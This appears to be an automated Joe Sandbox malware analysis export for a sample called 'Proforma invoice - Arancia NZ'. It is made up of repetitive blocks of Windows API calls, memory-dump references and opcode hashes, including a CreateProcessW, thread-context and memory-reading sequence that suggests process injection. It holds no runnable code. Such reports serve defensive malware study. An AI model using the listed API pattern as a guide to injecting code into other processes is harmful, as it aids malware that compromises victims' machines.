                                                                                                                    Similarity
                                                                                                                    • API ID: _memmove
                                                                                                                    • String ID: AU3!P/.$EA06
                                                                                                                    • API String ID: 4104443479-1743673582
                                                                                                                    • Opcode ID: bfa003ffbb43b192831ba8a9bef19e2919f594f315e18e2a397e28757227b880
                                                                                                                    • Instruction ID: c8be5ee5b80065777e8d951a42874285cd7cb98094ef0326134b333dd9582b1f
                                                                                                                    • Opcode Fuzzy Hash: bfa003ffbb43b192831ba8a9bef19e2919f594f315e18e2a397e28757227b880
                                                                                                                    • Instruction Fuzzy Hash: 65416C31A3515857CF22BF5488527BEFBB19B4530AF284075EC82DB282D6709DFC87A5
                                                                                                                    APIs
                                                                                                                    • _memset.LIBCMT ref: 0028EA39
                                                                                                                    • GetOpenFileNameW.COMDLG32(?), ref: 0028EA83
                                                                                                                      • Part of subcall function 00254750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00254743,?,?,002537AE,?), ref: 00254770
                                                                                                                      • Part of subcall function 00270791: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 002707B0
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                                                                                     • Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Name$Path$FileFullLongOpen_memset
                                                                                                                    • String ID: X
                                                                                                                    • API String ID: 3777226403-3081909835
                                                                                                                    • Opcode ID: 2b52382578a5e9033325b859d4c19e50774536a03b10574efe01252599f12cc2
                                                                                                                    • Instruction ID: 811cc952846fcf6004091ba92db741e5fb62727ae162e0169f7f7a56d757d541
                                                                                                                    • Opcode Fuzzy Hash: 2b52382578a5e9033325b859d4c19e50774536a03b10574efe01252599f12cc2
                                                                                                                    • Instruction Fuzzy Hash: C821F634A202489BCF019F94D845BEE7BFCAF48705F00805AE848E7281DBF4599D8F91
                                                                                                                    APIs
                                                                                                                    • GetTempPathW.KERNEL32(00000104,?), ref: 002B98F8
                                                                                                                    • GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 002B990F
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                                                                                     • Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Temp$FileNamePath
                                                                                                                    • String ID: aut
                                                                                                                    • API String ID: 3285503233-3010740371
                                                                                                                    • Opcode ID: 4199358d12c4d75988c243e3632e97c7f19d15cbd72a93ee2e3d20fa9bc2e783
                                                                                                                    • Instruction ID: 0b4aeef3e9fa092b0018848cf7f3a5df1e7efd20dbf3f8661a10b3da940d26ec
                                                                                                                    • Opcode Fuzzy Hash: 4199358d12c4d75988c243e3632e97c7f19d15cbd72a93ee2e3d20fa9bc2e783
                                                                                                                    • Instruction Fuzzy Hash: 7ED05B7594130D6BDB509B90EC0DFD6773CD704700F0042B1BE5591191D97099548B95
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                                                                                     • Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: c3bafc8feb560d52a3445876f9bd406f00d651ff837b2e2dc124034696f3ba74
                                                                                                                    • Instruction ID: de0c0278519ec08e81b64168abd67ea12670dfc4bbd12993ab4facbc38724517
                                                                                                                    • Opcode Fuzzy Hash: c3bafc8feb560d52a3445876f9bd406f00d651ff837b2e2dc124034696f3ba74
                                                                                                                    • Instruction Fuzzy Hash: 68F14A71A183019FC714DF28C484A6ABBE5FF89314F24892EF8999B351D770E955CF82
                                                                                                                    APIs
                                                                                                                    • _memset.LIBCMT ref: 00254370
                                                                                                                    • Shell_NotifyIconW.SHELL32(00000000,?), ref: 00254415
                                                                                                                    • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00254432
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                                                                                     • Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: IconNotifyShell_$_memset
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1505330794-0
                                                                                                                    • Opcode ID: 1648b3aa05d9b8fe6075940da31d10653e6244c943ff131883984fc61f29faa5
                                                                                                                    • Instruction ID: ee74fd1d4882ac936ef7d404c39f8b60e9f6492a31c3276b2b4059278c2381c8
                                                                                                                    • Opcode Fuzzy Hash: 1648b3aa05d9b8fe6075940da31d10653e6244c943ff131883984fc61f29faa5
                                                                                                                    • Instruction Fuzzy Hash: D331C371515701DFC721EF24D88469BFBF8FB48309F004D2EEA8A83251D771A998CB56
                                                                                                                    APIs
                                                                                                                    • __FF_MSGBANNER.LIBCMT ref: 00275733
                                                                                                                      • Part of subcall function 0027A16B: __NMSG_WRITE.LIBCMT ref: 0027A192
                                                                                                                      • Part of subcall function 0027A16B: __NMSG_WRITE.LIBCMT ref: 0027A19C
                                                                                                                    • __NMSG_WRITE.LIBCMT ref: 0027573A
                                                                                                                      • Part of subcall function 0027A1C8: GetModuleFileNameW.KERNEL32(00000000,003133BA,00000104,?,00000001,00000000), ref: 0027A25A
                                                                                                                      • Part of subcall function 0027A1C8: ___crtMessageBoxW.LIBCMT ref: 0027A308
                                                                                                                      • Part of subcall function 0027309F: ___crtCorExitProcess.LIBCMT ref: 002730A5
                                                                                                                      • Part of subcall function 0027309F: ExitProcess.KERNEL32 ref: 002730AE
                                                                                                                      • Part of subcall function 00278B28: __getptd_noexit.LIBCMT ref: 00278B28
                                                                                                                    • RtlAllocateHeap.NTDLL(00C10000,00000000,00000001,00000000,?,?,?,00270DD3,?), ref: 0027575F
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                                                                                     • Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1372826849-0
APIs
• CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000,?,?,002B9548,?,?,?,?,?,00000004), ref: 002B98BB
• SetFileTime.KERNELBASE(00000000,?,00000000,?,?,002B9548,?,?,?,?,?,00000004,00000001,?,?,00000004), ref: 002B98D1
• CloseHandle.KERNEL32(00000000,?,002B9548,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 002B98D8
Memory Dump Source
• Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
• Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
Similarity
• API ID: File$CloseCreateHandleTime
• String ID:
• API String ID: 3397143404-0
APIs
• _free.LIBCMT ref: 002B8D1B
  • Part of subcall function 00272D55: RtlFreeHeap.NTDLL(00000000,00000000,?,00279A24), ref: 00272D69
  • Part of subcall function 00272D55: GetLastError.KERNEL32(00000000,?,00279A24), ref: 00272D7B
• _free.LIBCMT ref: 002B8D2C
• _free.LIBCMT ref: 002B8D3E
Memory Dump Source
• Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
• Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
Similarity
• API ID: _free$ErrorFreeHeapLast
• String ID:
• API String ID: 776569668-0
Strings
Memory Dump Source
• Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
• Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
Similarity
• API ID:
• String ID: CALL
• API String ID: 0-4196123274
APIs
Memory Dump Source
• Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
• Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
Similarity
• API ID: _memmove
• String ID:
• API String ID: 4104443479-0
APIs
• IsThemeActive.UXTHEME ref: 00254834
  • Part of subcall function 0027336C: __lock.LIBCMT ref: 00273372
  • Part of subcall function 0027336C: DecodePointer.KERNEL32(00000001,?,00254849,002A7C74), ref: 0027337E
  • Part of subcall function 0027336C: EncodePointer.KERNEL32(?,?,00254849,002A7C74), ref: 00273389
  • Part of subcall function 002548FD: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 00254915
  • Part of subcall function 002548FD: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 0025492A
  • Part of subcall function 00253B3A: GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00253B68
  • Part of subcall function 00253B3A: IsDebuggerPresent.KERNEL32 ref: 00253B7A
  • Part of subcall function 00253B3A: GetFullPathNameW.KERNEL32(00007FFF,?,?,003152F8,003152E0,?,?), ref: 00253BEB
  • Part of subcall function 00253B3A: SetCurrentDirectoryW.KERNEL32(?), ref: 00253C6F
• SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00254874
Memory Dump Source
• Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
• Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
Similarity
• API ID: InfoParametersSystem$CurrentDirectoryPointer$ActiveDebuggerDecodeEncodeFullNamePathPresentTheme__lock
• String ID:
• API String ID: 1438897964-0
APIs
  • Part of subcall function 0027571C: __FF_MSGBANNER.LIBCMT ref: 00275733
  • Part of subcall function 0027571C: __NMSG_WRITE.LIBCMT ref: 0027573A
  • Part of subcall function 0027571C: RtlAllocateHeap.NTDLL(00C10000,00000000,00000001,00000000,?,?,?,00270DD3,?), ref: 0027575F
• std::exception::exception.LIBCMT ref: 00270DEC
• __CxxThrowException@8.LIBCMT ref: 00270E01
  • Part of subcall function 0027859B: RaiseException.KERNEL32(?,?,?,00309E78,00000000,?,?,?,?,00270E06,?,00309E78,?,00000001), ref: 002785F0
Memory Dump Source
• Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
• Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
Similarity
• API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
• String ID:
• API String ID: 3902256705-0
APIs
  • Part of subcall function 00278B28: __getptd_noexit.LIBCMT ref: 00278B28
• __lock_file.LIBCMT ref: 002753EB
  • Part of subcall function 00276C11: __lock.LIBCMT ref: 00276C34
• __fclose_nolock.LIBCMT ref: 002753F6
Memory Dump Source
• Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
• Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
Similarity
• API ID: __fclose_nolock__getptd_noexit__lock__lock_file
• String ID:
• API String ID: 2800547568-0
APIs
• CreateProcessW.KERNELBASE(?,00000000), ref: 00C51923
• Wow64GetThreadContext.KERNEL32(?,00010007), ref: 00C519B9
• ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 00C519DB
Memory Dump Source
• Source File: 00000000.00000002.2013476899.0000000000C4F000.00000040.00000020.00020000.00000000.sdmp, Offset: 00C4F000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_c4f000_Proforma invoice - Arancia NZ.jbxd
Similarity
• API ID: Process$ContextCreateMemoryReadThreadWow64
• String ID:
• API String ID: 2438371351-0
                                                                                                                    • Opcode ID: d88754d343c0358fec48bb39518f6d050a5efe1528146ba10a354079ac39ca1d
                                                                                                                    • Instruction ID: 98a4dc7adbbad8a7824f430e19d59fba901de12ff8965de59ff91fe51b79f78d
                                                                                                                    • Opcode Fuzzy Hash: d88754d343c0358fec48bb39518f6d050a5efe1528146ba10a354079ac39ca1d
                                                                                                                    • Instruction Fuzzy Hash: E812EF24E14658C6EB24DF60D8507DEB232EF68301F1090E9950DEB7A4E77A4F85CF5A
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ProtectVirtual
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 544645111-0
                                                                                                                    • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                                                                    • Instruction ID: 17fc323251b9e008adee6123904f19aaf4202a7ebfecad3db6d15c6e327472f0
                                                                                                                    • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                                                                    • Instruction Fuzzy Hash: 1131C370A10106DBC71ADF58C4C4A69FBA6FB59300B64C6AAE80ACB351D671EDE5DB80
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ClearVariant
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1473721057-0
                                                                                                                    • Opcode ID: e0e92ff8d531179f3e53d3e616d04ffb37b77f46f6d5797841ad50c25af31c77
                                                                                                                    • Instruction ID: ed55ee89bc1bae91a90d1f2af2b0b65a5f06aed5fcc0c39933ebe3c748651234
                                                                                                                    • Opcode Fuzzy Hash: e0e92ff8d531179f3e53d3e616d04ffb37b77f46f6d5797841ad50c25af31c77
                                                                                                                    • Instruction Fuzzy Hash: 30411774514341CFDB14DF14C484B1ABBE1BF49319F0989ACE99A8B762C332E859CF56
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _memmove
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 4104443479-0
                                                                                                                    • Opcode ID: 5bbb6a6db4c41ac72993fe4b49b36fc398c80b89a4af3cb61758aec611d30b51
                                                                                                                    • Instruction ID: f61677337b3c77552a193081583f154a5e32235111f37260eea52790ccbe4b5c
                                                                                                                    • Opcode Fuzzy Hash: 5bbb6a6db4c41ac72993fe4b49b36fc398c80b89a4af3cb61758aec611d30b51
                                                                                                                    • Instruction Fuzzy Hash: 25213672A35A09EBDF10AF12F8417AA7BB8FB14351F22842FE846C5190EB7095F4CB05
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: eb38f1e40c2d73bac2084b9b3cbe7e2f505631c201106345c54bdb1a4fc8cfaf
                                                                                                                    • Instruction ID: 407a5add53f776c187e4358ec3bc1aa503b682b3aa3d3c8517815b80bc283b67
                                                                                                                    • Opcode Fuzzy Hash: eb38f1e40c2d73bac2084b9b3cbe7e2f505631c201106345c54bdb1a4fc8cfaf
                                                                                                                    • Instruction Fuzzy Hash: 492129354183D2AFC7228B3498665E5BFE5DF83311F0484DEECD84AC96D170685BC786
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00254BB5: FreeLibrary.KERNEL32(00000000,?), ref: 00254BEF
                                                                                                                      • Part of subcall function 0027525B: __wfsopen.LIBCMT ref: 00275266
                                                                                                                    • LoadLibraryExW.KERNEL32(?,00000000,00000002,?,003152F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00254E0F
                                                                                                                      • Part of subcall function 00254B6A: FreeLibrary.KERNEL32(00000000), ref: 00254BA4
                                                                                                                      • Part of subcall function 00254C70: _memmove.LIBCMT ref: 00254CBA
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Library$Free$Load__wfsopen_memmove
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1396898556-0
                                                                                                                    • Opcode ID: 94eb2913d1f9d8fd3974e6cb14ddd331cfdcacbabe0b61d3316d6b589dbdd243
                                                                                                                    • Instruction ID: 2dfe0b25af9479f4b9f1fce8abf7ed96870326b056670d960efe9289d2a794f5
                                                                                                                    • Opcode Fuzzy Hash: 94eb2913d1f9d8fd3974e6cb14ddd331cfdcacbabe0b61d3316d6b589dbdd243
                                                                                                                    • Instruction Fuzzy Hash: 4A112731620205ABCF14BF70C817FADB7A4AF44709F108429FD42A71C1DAB09E699F58
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ClearVariant
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1473721057-0
                                                                                                                    • Opcode ID: 8d5c00cdd40f94cd3fbb2cf231bc56a906eda14ae2c7e5e560e240f4c228c945
                                                                                                                    • Instruction ID: 3b6f9aca05205b4f3a862c5b574097ae597b0225b0302e673da0705e525589aa
                                                                                                                    • Opcode Fuzzy Hash: 8d5c00cdd40f94cd3fbb2cf231bc56a906eda14ae2c7e5e560e240f4c228c945
                                                                                                                    • Instruction Fuzzy Hash: 57213374928301DFCB14DF24C484B1ABBE1BF88316F048968F88A47722D731E868CF96
                                                                                                                    APIs
                                                                                                                    • __lock_file.LIBCMT ref: 002748A6
                                                                                                                      • Part of subcall function 00278B28: __getptd_noexit.LIBCMT ref: 00278B28
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
